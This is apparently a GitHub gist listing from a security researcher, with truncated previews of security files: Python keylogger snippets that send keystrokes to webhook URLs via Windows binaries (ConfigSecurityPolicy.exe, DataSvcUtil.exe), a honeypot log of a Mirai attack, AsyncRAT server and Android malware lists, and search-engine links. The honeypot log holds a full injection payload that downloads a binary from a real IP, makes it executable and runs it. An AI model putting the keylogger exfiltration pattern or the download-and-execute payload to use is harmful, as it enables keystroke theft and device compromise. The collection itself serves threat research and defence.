teixeira0xfffff
class DexCrypto:
    KEY = "qtfreet"
    hexString = "0123456789ABCDEF"

    @staticmethod
    def FxIjsF(p0):
        i = 2
        i1 = 1
        i2 = 0
        ointArray = [0] * 27
teixeira0xfffff / AsyncRAT_Server.csv
Created December 4, 2023 11:10
AsyncRAT Server listed on Fofa search engine https://en.fofa.info/
teixeira0xfffff / handler.py
Created December 30, 2022 10:32
Python keylogger with weaponized Binary part of Windows Defender
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://{your sub here}.free.beeceptor.com'
uploader = "C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe"
content = ""
def on_press(key):
teixeira0xfffff / search_engines.csv
Last active March 1, 2024 20:51
Cybersecurity search engines for researchers [source https://twitter.com/danielmakelley/status/1570910911078207488]
Name,URL,Description
Dehashed,https://www.dehashed.com/,View leaked credentials
SecurityTrails,https://securitytrails.com/,Extensive DNS data
DorkSearch,https://dorksearch.com/,Really fast Google dorking
ExploitDB,https://www.exploit-db.com/,Archive of various exploits
ZoomEye,https://www.zoomeye.org/project?id=firewall,Gather information about targets
Pulsedive,https://pulsedive.com/,Search for threat intelligence
GrayHatWarfare,https://buckets.grayhatwarfare.com/,Search public S3 buckets
PolySwarm,https://polyswarm.io/,Scan files and URLs for threats
Fofa,https://github.com/wgpsec/fofa_viewer,Search for various threat intelligence
teixeira0xfffff / ransomwarefeed.csv
Last active November 10, 2023 17:39
Ransomware Feeds
teixeira0xfffff / DataSvcUtil.py
Created December 2, 2020 01:54
Data exfil with DataSvcUtil.exe
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
content = ""
def on_press(key):
    global content
teixeira0xfffff / mirai.tsv
Last active November 20, 2020 12:02
Tpot experiment on Digital Ocean [https://github.com/telekom-security/tpotce]
"@timestamp","alert.signature","http.http_request_body_printable","src_ip","src_port","geoip.country_name","payload_printable","http.url","geoip.as_org","geoip.city_name","geoip.asn"
"Nov 8, 2020 @ 23:17:59.126","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`
","94.200.76.222",49573,"United Arab Emirates","POST /cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1:8089
Content-Length: 172
Accept-Encoding: application/json
action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`
teixeira0xfffff / ReportedApps.csv
Last active July 8, 2020 03:04
Android Malwares [Google Play] | reported by @ReBensk @sh1shk0va @malwrhunterteam
App Info,Developer Name,Package Name,Google Play,Developer Email,Hash
Message Moment,Mandy L Smith,com.ppp.kkk,https://play.google.com/store/apps/details?id=com.ppp.kkk,tchick4u@gmail.com,487f13296e086e606496d26a2547dcfe3f88812e723fa21e94c52b395a0dd361
Gold Miner Game,Margie C Smith,sg.com.goldminerplusgame,https://play.google.com/store/apps/details?id=sg.com.goldminerplusgame,manuqsngdj@gmail.com,97ed67a5d9b1ffe2f3a5093e7461acb8bdad94f22b6ae1f18d24bf8960aa0363
Measure Wallpaper,Donal J Smith,kw.com.measurewallpapers.glitter,https://play.google.com/store/apps/details?id=kw.com.measurewallpapers.glitter,ritvplnci9@gmail.com,2bb4cf4853d7616b22520756c89c864b43753692c2187d72ce9266445a14c50b
Sophisticated Scanner - No trouble & profession,Cedon M Smith,com.ss.pdf.creat.soph.scanner,https://play.google.com/store/apps/details?id=com.ss.pdf.creat.soph.scanner,invesumb970@gmail.com,59e624b1167df9951e6efe7f22e7046bef5f09f6af748a020d4f97b04eefd61d
Profession Translator -Find the charm of languages,David G Smith,com.tra
teixeira0xfffff / evilTwin.php
Created June 15, 2020 23:43
Auto Visitor [encoded version]
<?php
// Auto Visitor
// https://github.com/eviltwin-dev/auto-visitor